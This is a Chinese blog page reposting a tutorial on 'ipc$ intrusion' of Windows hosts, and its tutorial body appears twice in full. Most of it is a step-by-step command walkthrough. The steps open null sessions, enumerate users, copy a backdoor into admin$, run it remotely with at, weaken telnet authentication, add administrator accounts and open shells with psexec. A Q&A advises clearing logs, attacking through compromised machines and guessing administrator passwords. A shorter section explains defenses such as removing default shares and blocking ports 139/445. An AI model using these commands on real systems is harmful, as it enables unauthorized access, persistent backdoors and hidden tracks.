- 浏览: 437176 次
- 性别:
- 来自: 北京
文章分类
- 全部博客 (267)
- java (8)
- 求职&面试 (1)
- linux (33)
- windows (1)
- C++ (5)
- android (12)
- QT (1)
- 经验 (1)
- memory-leaks (1)
- Streaming&V/A (1)
- network&security (5)
- SCM (13)
- mysql (10)
- browsers (4)
- Windows APIs (2)
- opensource (1)
- pm (1)
- GDI (1)
- database (14)
- MFC (1)
- web&fronts (17)
- Tomcat (4)
- OLE (1)
- 观后感 (1)
- Production (2)
- UML (3)
- Javascript (7)
- Cloud Computing&SAAS (5)
- SoftwareEngineering (1)
- Computer&Maintenance (1)
- Web (8)
- Desgin (1)
- J2ee (10)
- mysql cluster (0)
- LB&HA (2)
- webserver (11)
- php (5)
- cas&authtication (0)
- Languages (1)
- IDEs (3)
- architecture (2)
- iOS (8)
- spring (3)
- webservices (1)
- security (1)
- MVCFrameworks (2)
- bservices (0)
- build-tools (2)
- unittest (1)
- spring-security (0)
- sphinx (2)
- hibernate (1)
- mybatis (2)
- search (0)
- nginx (2)
- design&production (2)
- DFS (0)
- algorithm (0)
- distributed&network (0)
- blogs (0)
- os&admin (0)
- fastcgi (0)
- kv-db (0)
- operation&maintenance (1)
- productions (9)
- 养生 (1)
- appserver (1)
- HTTP (2)
- test (1)
- erlang (2)
- browser (0)
- 非技术 (2)
- mobiles (2)
- cloud computing (2)
- Business (2)
- maven (1)
- python (5)
- 人生 (0)
- Cryptography (3)
- CV (0)
- cms (2)
- jqm (2)
- html (2)
- flex (1)
- redmine (1)
- iptables (1)
- groovy (1)
- scala (1)
- grails (1)
- ftp (3)
- vsftpd (2)
- lua (0)
- chroot (3)
- jailkit (3)
- UED (0)
- myeclipse (2)
- ide (2)
- eclipse (2)
最新评论
-
Nick712:
http://blog.csdn.net/victory08/ ...
处理SVN出现:Cleanup failed to process the following paths: xxx -
xs6262460:
Spring AOP根据JdbcTemplate方法名动态设置数据源 -
xhpscdx:
我的解决办法是把D:\ACRS\Projects\TAIS 下 ...
处理SVN出现:Cleanup failed to process the following paths: xxx -
hnraysir:
总结得相当不错,支持下。
使用CodeIgniter 创建 RESTful 服务 REST API【原创译文】 -
云上太阳:
这个必须评论下,间接的救过俺的命啊
解决tomcat启动报错,加强错误日志的显示:
入侵中可能会用到的命令
入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。
1 建立/删除ipc$连接的命令
1)建立空连接:
net use 127.0.0.1ipc$ "" /user:""
2)建立非空连接:
net use 127.0.0.1ipc$ "密码" /user:"用户名"
3)删除连接:
net use 127.0.0.1ipc$ /del
2 在ipc$连接中对远程主机的操作命令
1) 查看远程主机的共享资源(看不到默认共享):
net view 127.0.0.1
2) 查看远程主机的当前时间:
net time 127.0.0.1
3) 得到远程主机的netbios用户名列表:
nbtstat -a 127.0.0.1
4)映射/删除远程共享:
net use z: 127.0.0.1c
此命令将共享名为c的共享资源映射为本地z盘
net use z: /del
删除映射的z盘,其他盘类推
5)向远程主机复制文件:
copy 路径文件名 ip共享目录名,如:
copy c:xinxin.exe 127.0.0.1c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy 127.0.0.1c$xinxin.exe c:
6)远程添加计划任务:
at ip 时间 程序名 如:
at 127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径
3 本地命令
1)查看本地主机的共享资源(可以看到本地的默认共享)
net share
2)得到本地主机的用户列表
net user
3)显示本地某用户的帐户信息
net user 帐户名
4)显示本地主机当前启动的服务
net start
5)启动/关闭本地服务
net start 服务名
net stop 服务名
6)在本地添加帐户
net user 帐户名 密码 /add
7)激活禁用的用户
net uesr 帐户名 /active:yes
8)加入管理员组
net localgroup administrators 帐户名 /add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
4 其他一些命令
1)telnet
telnet ip 端口
telnet 127.0.0.0 23
2)用opentelnet.exe开启远程主机的telnet
opentelnet.exe ip 管理员帐号 密码 ntlm的认证方式 port
opentelnet.exe 127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启remoteregistry服务,用户就可以更改ntlm认证
4)对仅win2k/xp有效
3)用psexec.exe一步获得shell,需要ipc管道支持
psexec.exe ip -u 管理员帐号 -p 密码 cmd
psexec.exe 127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的ipc$入侵
既然是对比,那么我就先把过去的ipc$入侵步骤写给大家,都是蛮经典的步骤:
[1]
c:>net use 127.0.0.1ipc$ "" /user:admintitrators
用扫到的空口令建立连接
[2]
c:>net view 127.0.0.1
查看远程的共享资源
[3]
c:>copy srv.exe 127.0.0.1admin$system32
将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启
[4]
c:>net time 127.0.0.1
查看远程主机的当前时间
[5]
c:>at 127.0.0.1 时间 srv.exe
用at命令远程运行srv.exe,需要对方开启了'task scheduler'服务
[6]
c:>net time 127.0.0.1
再次查看当前时间来估算srv.exe是否已经运行,此步可以省略
[7]
c:>telnet 127.0.0.1 99
开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思?那你就把它想象成远程机器的控制权就好了,操作像dos),99端口是srv.exe开的一次性后门的端口
[8]
c:winntsystem32>net start telnet
我们在刚刚登陆上的shell中启动远程机器的telnet服务,毕竟srv.exe是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的telnet已经启动,此步可省略
[9]
c:>copy ntlm.exe 127.0.0.1admin$system32
在原来那个窗口中将ntlm.exe传过去,ntlm.exe是用来更改telnet身份验证的
[10]
c:winntsystem32>ntlm.exe
在shell窗口中运行ntlm.exe,以后你就可以畅通无阻的telnet这台主机了
[11]
c:>telnet 127.0.0.1 23
在新窗口中telnet到127.0.0.1,端口23可省略,这样我们又获得一个长期的后门
[12]
c:winntsystem32>net user 帐户名 密码 /add
c:winntsystem32>net uesr guest /active:yes
c:winntsystem32>net localgroup administrators 帐户名 /add
telnet上以后,你可以建立新帐户,激活guest,把任何帐户加入管理员组等
好了,写到这里我似乎回到了2,3年前,那时的ipc$大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的ipc$入侵吧。
[1]
psexec.exe ip -u 管理员帐号 -p 密码 cmd
用这个工具我们可以一步到位的获得shell
opentelnet.exe server 管理员帐号 密码 ntlm的认证方式 port
用它可以方便的更改telnet的验证方式和端口,方便我们登陆
[2]
已经没有第二步了,用一步获得shell之后,你做什么都可以了,安后门可以用winshell,克隆就用ca吧,开终端用3389.vbe,记录密码用win2kpass,总之好的工具不少,随你选了,我就不多说了。
十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
运行regedit,找到如下主键[hkey_local_machinesystemcurrentc = dword的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到ipc$共享,但无法通过这种连接得到列举sam帐号和共享信息的权限;在windows 2000 中增加了"2",未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。如果你觉得改注册表麻烦,可以在本地安全设置中设置此项: 在本地安全设置-本地策略-安全选项-'对匿名连接的额外限制'
2 禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)禁止自动打开默认共享(此操作并不能关闭ipc$共享)
运行-regedit
server版:找到如下主键[hkey_local_machinesystemcurrentc
pro版:找到如下主键[hkey_local_machinesystemcurrentc
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使设置生效。
3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享,那就禁止server服务吧:
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用,这时可能会有提示说:xxx服务也会关闭是否继续,因为还有些次要的服务要依赖于server服务,不要管它。
4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。
1)139端口可以通过禁止nbt来屏蔽
本地连接-tcp/it属性-高级-wins-选‘禁用tcp/it上的netbios’一项
2)445端口可以通过修改注册表来屏蔽
添加一个键值
hive: hkey_local_machine
key: systemcontrolsetservicesnetbtparameters
name: smbdeviceenabled
type: reg_dword
value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。
3)安装防火墙进行端口过滤
6 设置复杂密码,防止通过ipc$穷举出密码,我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全的多。
十五 ipc$入侵问答精选
1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?
答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。
2.你看下面的情况是为什么,可以连接但不能复制
net use ***.***.***.***ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe ***.***.***.***admin$
找不到网络路径
命令不成功
答:像“找不到网络路径”“找不到网络名”之类的问题,大多是因为你想要复制到的共享文件夹没有开启,所以在复制的时候会出现错误,你可以试着找找其他的共享文件夹。
3.如果对方开了ipc$,且能建立空联接,但打开c、d盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗?
答:建议先用流光或者别的什么扫描软件试着猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。
4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view ip发现它没开默认共享,我该怎么办?
答:首先纠正你的一个错误,用net view ip是无法看到默认共享的,你可以试着将文件复制到c$,d$看看,如果都不行,说明他关闭了默认共享,那你就用opentelnet.exe或psexec.exe吧,用法上面有。
5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事?
net uset ccbirds /add
答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell(比如telnet)之后,你才能在远程机器建立一个帐户,否则你的操作只是在本地进行。
6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办?
答:一般来说“拒绝访问”都是权限不够的结果,可能是你用的帐户有问题,还有一种可能,如果你想向普通共享文件夹复制文件却返回这个错误,说明这个文件夹设置的允许访问用户中不包括你(哪怕你是管理员),这一点我在上一期文章中分析了。
7.我用win98能与对方建立ipc$连接吗?
答:理论上不可以,要进行ipc$的操作,建议用win2000,用其他操作系统会带来许多不必要的麻烦。
8.我用net use ipipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -a ip 却无法导出用户列表,这是为什么?
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;还有可能是你自己的nbt没有打开,netstat命令是建立在nbt之上的。
9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事?
答:呵呵,这说明你已经与目标主机建立了ipc$连接,两个主机间同时建立两个ipc$连接是不允许的。
10.我在映射的时候出现:
f:>net use h: 211.161.134.*e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?
答:你也太粗心了吧,这说明你有一个h盘了,映射到没有的盘符吧!
11.我建立了一个连接f:>net use *.*.*.*ipc$ "123" /user:"guest" 成功了,但当我映射时出现了错误,向我要密码,怎么回事?
f:>net use h: *.*.*.*c$
密码在 *.*.*.*c$ 无效。
请键入 *.*.*.*c$ 的密码:
系统发生 5 错误。
拒绝访问。
答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射c$这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。
12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?
答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.
13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么?
答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。
14.我用net use 192.168.0.2ipc$ "password" /user:"administrator" 成功,可是 net use i: 192.168.0.2c
出现请键入 192.168.0.2 的密码,怎么回事情呢?我用的可是管理员呀?应该什么都可以访问呀?
答:虽然你具有管理员权限,但管理员在设置c盘共享权限时(注意:普通共享可以设置访问权限,而默认共享则不能)可能并未设置允许administrator访问,所以会出现上述问题。
15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器?如果禁止server服务呢?
答:禁止以上两项仍可以发起ipc$连接,不过这种问题自己动手试验会更好。
16.能告诉我下面的两个错误产生的原因吗?
c:>net time 61.225.*.*
系统发生 5 错误。
拒绝访问。
c:>net view 61.225.*.*
系统发生 5 错误。
拒绝访问。
答:起初遇到这个问题的时候我也很纳闷,错误5表示权限不够,可是连空会话的权限都可以完成上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同志告诉我的确是这样,他忘记了自己已经删了ipc$连接,之后他又输入了上面那两个命令,随之发生了错误5。
17.您看看这是怎么回事?
f:>net time
找不到时间服务器。
请键入 net helpmsg 3912 以获得更多的帮助。
答:答案很简单,你的命令错了,应该是net time ip
没输入ip地址,当然找不到服务器。view的命令也应该有ip地址,即:net view ip
入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。
1 建立/删除ipc$连接的命令
1)建立空连接:
net use 127.0.0.1ipc$ "" /user:""
2)建立非空连接:
net use 127.0.0.1ipc$ "密码" /user:"用户名"
3)删除连接:
net use 127.0.0.1ipc$ /del
2 在ipc$连接中对远程主机的操作命令
1) 查看远程主机的共享资源(看不到默认共享):
net view 127.0.0.1
2) 查看远程主机的当前时间:
net time 127.0.0.1
3) 得到远程主机的netbios用户名列表:
nbtstat -a 127.0.0.1
4)映射/删除远程共享:
net use z: 127.0.0.1c
此命令将共享名为c的共享资源映射为本地z盘
net use z: /del
删除映射的z盘,其他盘类推
5)向远程主机复制文件:
copy 路径文件名 ip共享目录名,如:
copy c:xinxin.exe 127.0.0.1c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy 127.0.0.1c$xinxin.exe c:
6)远程添加计划任务:
at ip 时间 程序名 如:
at 127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径
3 本地命令
1)查看本地主机的共享资源(可以看到本地的默认共享)
net share
2)得到本地主机的用户列表
net user
3)显示本地某用户的帐户信息
net user 帐户名
4)显示本地主机当前启动的服务
net start
5)启动/关闭本地服务
net start 服务名
net stop 服务名
6)在本地添加帐户
net user 帐户名 密码 /add
7)激活禁用的用户
net uesr 帐户名 /active:yes
8)加入管理员组
net localgroup administrators 帐户名 /add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
4 其他一些命令
1)telnet
telnet ip 端口
telnet 127.0.0.0 23
2)用opentelnet.exe开启远程主机的telnet
opentelnet.exe ip 管理员帐号 密码 ntlm的认证方式 port
opentelnet.exe 127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启remoteregistry服务,用户就可以更改ntlm认证
4)对仅win2k/xp有效
3)用psexec.exe一步获得shell,需要ipc管道支持
psexec.exe ip -u 管理员帐号 -p 密码 cmd
psexec.exe 127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的ipc$入侵
既然是对比,那么我就先把过去的ipc$入侵步骤写给大家,都是蛮经典的步骤:
[1]
c:>net use 127.0.0.1ipc$ "" /user:admintitrators
用扫到的空口令建立连接
[2]
c:>net view 127.0.0.1
查看远程的共享资源
[3]
c:>copy srv.exe 127.0.0.1admin$system32
将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启
[4]
c:>net time 127.0.0.1
查看远程主机的当前时间
[5]
c:>at 127.0.0.1 时间 srv.exe
用at命令远程运行srv.exe,需要对方开启了'task scheduler'服务
[6]
c:>net time 127.0.0.1
再次查看当前时间来估算srv.exe是否已经运行,此步可以省略
[7]
c:>telnet 127.0.0.1 99
开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思?那你就把它想象成远程机器的控制权就好了,操作像dos),99端口是srv.exe开的一次性后门的端口
[8]
c:winntsystem32>net start telnet
我们在刚刚登陆上的shell中启动远程机器的telnet服务,毕竟srv.exe是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的telnet已经启动,此步可省略
[9]
c:>copy ntlm.exe 127.0.0.1admin$system32
在原来那个窗口中将ntlm.exe传过去,ntlm.exe是用来更改telnet身份验证的
[10]
c:winntsystem32>ntlm.exe
在shell窗口中运行ntlm.exe,以后你就可以畅通无阻的telnet这台主机了
[11]
c:>telnet 127.0.0.1 23
在新窗口中telnet到127.0.0.1,端口23可省略,这样我们又获得一个长期的后门
[12]
c:winntsystem32>net user 帐户名 密码 /add
c:winntsystem32>net uesr guest /active:yes
c:winntsystem32>net localgroup administrators 帐户名 /add
telnet上以后,你可以建立新帐户,激活guest,把任何帐户加入管理员组等
好了,写到这里我似乎回到了2,3年前,那时的ipc$大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的ipc$入侵吧。
[1]
psexec.exe ip -u 管理员帐号 -p 密码 cmd
用这个工具我们可以一步到位的获得shell
opentelnet.exe server 管理员帐号 密码 ntlm的认证方式 port
用它可以方便的更改telnet的验证方式和端口,方便我们登陆
[2]
已经没有第二步了,用一步获得shell之后,你做什么都可以了,安后门可以用winshell,克隆就用ca吧,开终端用3389.vbe,记录密码用win2kpass,总之好的工具不少,随你选了,我就不多说了。
十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
运行regedit,找到如下主键[hkey_local_machinesystemcurrentc = dword的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到ipc$共享,但无法通过这种连接得到列举sam帐号和共享信息的权限;在windows 2000 中增加了"2",未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。如果你觉得改注册表麻烦,可以在本地安全设置中设置此项: 在本地安全设置-本地策略-安全选项-'对匿名连接的额外限制'
2 禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)禁止自动打开默认共享(此操作并不能关闭ipc$共享)
运行-regedit
server版:找到如下主键[hkey_local_machinesystemcurrentc
pro版:找到如下主键[hkey_local_machinesystemcurrentc
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使设置生效。
3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享,那就禁止server服务吧:
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用,这时可能会有提示说:xxx服务也会关闭是否继续,因为还有些次要的服务要依赖于server服务,不要管它。
4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。
1)139端口可以通过禁止nbt来屏蔽
本地连接-tcp/it属性-高级-wins-选‘禁用tcp/it上的netbios’一项
2)445端口可以通过修改注册表来屏蔽
添加一个键值
hive: hkey_local_machine
key: systemcontrolsetservicesnetbtparameters
name: smbdeviceenabled
type: reg_dword
value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。
3)安装防火墙进行端口过滤
6 设置复杂密码,防止通过ipc$穷举出密码,我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全的多。
十五 ipc$入侵问答精选
1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?
答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。
2.你看下面的情况是为什么,可以连接但不能复制
net use ***.***.***.***ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe ***.***.***.***admin$
找不到网络路径
命令不成功
答:像“找不到网络路径”“找不到网络名”之类的问题,大多是因为你想要复制到的共享文件夹没有开启,所以在复制的时候会出现错误,你可以试着找找其他的共享文件夹。
3.如果对方开了ipc$,且能建立空联接,但打开c、d盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗?
答:建议先用流光或者别的什么扫描软件试着猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。
4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view ip发现它没开默认共享,我该怎么办?
答:首先纠正你的一个错误,用net view ip是无法看到默认共享的,你可以试着将文件复制到c$,d$看看,如果都不行,说明他关闭了默认共享,那你就用opentelnet.exe或psexec.exe吧,用法上面有。
5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事?
net uset ccbirds /add
答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell(比如telnet)之后,你才能在远程机器建立一个帐户,否则你的操作只是在本地进行。
6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办?
答:一般来说“拒绝访问”都是权限不够的结果,可能是你用的帐户有问题,还有一种可能,如果你想向普通共享文件夹复制文件却返回这个错误,说明这个文件夹设置的允许访问用户中不包括你(哪怕你是管理员),这一点我在上一期文章中分析了。
7.我用win98能与对方建立ipc$连接吗?
答:理论上不可以,要进行ipc$的操作,建议用win2000,用其他操作系统会带来许多不必要的麻烦。
8.我用net use ipipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -a ip 却无法导出用户列表,这是为什么?
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;还有可能是你自己的nbt没有打开,netstat命令是建立在nbt之上的。
9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事?
答:呵呵,这说明你已经与目标主机建立了ipc$连接,两个主机间同时建立两个ipc$连接是不允许的。
10.我在映射的时候出现:
f:>net use h: 211.161.134.*e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?
答:你也太粗心了吧,这说明你有一个h盘了,映射到没有的盘符吧!
11.我建立了一个连接f:>net use *.*.*.*ipc$ "123" /user:"guest" 成功了,但当我映射时出现了错误,向我要密码,怎么回事?
f:>net use h: *.*.*.*c$
密码在 *.*.*.*c$ 无效。
请键入 *.*.*.*c$ 的密码:
系统发生 5 错误。
拒绝访问。
答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射c$这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。
12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?
答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.
13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么?
答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。
14.我用net use 192.168.0.2ipc$ "password" /user:"administrator" 成功,可是 net use i: 192.168.0.2c
出现请键入 192.168.0.2 的密码,怎么回事情呢?我用的可是管理员呀?应该什么都可以访问呀?
答:虽然你具有管理员权限,但管理员在设置c盘共享权限时(注意:普通共享可以设置访问权限,而默认共享则不能)可能并未设置允许administrator访问,所以会出现上述问题。
15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器?如果禁止server服务呢?
答:禁止以上两项仍可以发起ipc$连接,不过这种问题自己动手试验会更好。
16.能告诉我下面的两个错误产生的原因吗?
c:>net time 61.225.*.*
系统发生 5 错误。
拒绝访问。
c:>net view 61.225.*.*
系统发生 5 错误。
拒绝访问。
答:起初遇到这个问题的时候我也很纳闷,错误5表示权限不够,可是连空会话的权限都可以完成上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同志告诉我的确是这样,他忘记了自己已经删了ipc$连接,之后他又输入了上面那两个命令,随之发生了错误5。
17.您看看这是怎么回事?
f:>net time
找不到时间服务器。
请键入 net helpmsg 3912 以获得更多的帮助。
答:答案很简单,你的命令错了,应该是net time ip
没输入ip地址,当然找不到服务器。view的命令也应该有ip地址,即:net view ip
发表评论
-
nonce和timestamp在Http安全协议中的作用
2013-06-19 01:14 1398nonce和timestamp在Http安全 ... -
google服务打不开的解决办法
2012-12-23 21:00 1509google服务打不开的解决办法 ... -
Nbtstat命令用法
2012-12-17 15:42 904Nbtstat命令用法 ... -
12个国外的免费VPN代理
2012-12-03 12:56 712个国外的免费VPN代理 VPN ... -
开源web应用防火墙 Naxsi
2012-11-17 22:20 0Naxsi是一个开放源代码、高效、低维护规则的Nginx we ... -
lanmanworkstation是什么服务
2012-10-09 10:10 6543lanmanworkstation lanma ...
相关推荐
入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件 的压缩包加密,防止被杀。) ...
(2)PATH命令中的路径,若有两条以上,各路径之间以一个分号“;”隔开; (3)PATH命令有三种使用方法: PATH[盘符1:][路径1][盘符2:][路径2]…(设定可执行文件的搜索路径) PATH:(取消所有路径) ...
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车如图6。 ...
入侵别人之前自己的电脑当然要设置好,要不然会很不方便。 这里讲几个常用的: 修改administrator的名称,可以不用设置开机密码.省得每次开机都输密码麻烦,别人扫描的时候多数情况下都是以administrator和guest或...
就是把DOS命令写在一个文本文件里面,然后保存的时候保存成...在无盘运用及Hack入侵过程中,经常都会用到。 一.简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。 ......... ........
其实现在ftp的软件很多,很方便,但你说这些命令没用也是不可能的,就像windows下一样还保留着命令提示符.:)_ 特别有些时候ftp软件很多地方做不到的,.? 什么地方。 打个比方,我看过一种觅名ftp用户得到admin的入侵...
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用...
账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此... 一、“命令提示符”中的阴谋 其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单
30)批处理在入侵中的几则妙用! 15 31)再说几个非常简单实用的DOS命令(工具): 15 32)ping命令的其他技巧: 17 局域网应用问题专题解答 (Rayi々) 18 1、问:我访问局域网中的计算机时,为什么常常被提示要输入...
对于单次SQL注入最可能会用到下列哪组字符? A.双引号 B.单引号 C.# D.— 正确答案:B; 3.仅根据扩展名判断,以下哪个文件不是动态页面? 正确答案:D; 4.关于XSS的说法以下哪项是正确的? A.XSS全称为Cascading ...
对于单次SQL注入最可能会用到以下哪组字符? A.双引号 B.单引号 C.# D.— 正确答案:B; 3.仅根据扩展名判断,以下哪个文件不是动态页面? 正确答案:D; 4.关于XSS的说法以下哪项是正确的? A.XSS全称为Cascading ...
但是用户平时使用到的服务组件毕竟还是有限,而那些很少用到的组件不但占用了不少系统资源,会引起系统不稳定外,它还会为黑客的远程入侵提供了多种途径,为此我们应该尽量把那些暂不需要的服务组件屏蔽掉。...
事实上,用不着这么麻烦,只要大家确认已经在BIOS中打开高级电源控制选项,同时选择ACPI Pc,一定不要选错,否则重启后可能无法进入Windows,并重新启动电脑,电脑可能会重新搜索并自动重新安装电脑的硬件,之后就...
webshell中由于需要完成一些特殊的功能就不可避免的用到一些特殊的函数,我们也就可以对着特征值做检查来定位webshell,同样的webshell本身也会进行加密来躲避这种检测。下图就是一张phpwebshell的截图,它的功能...
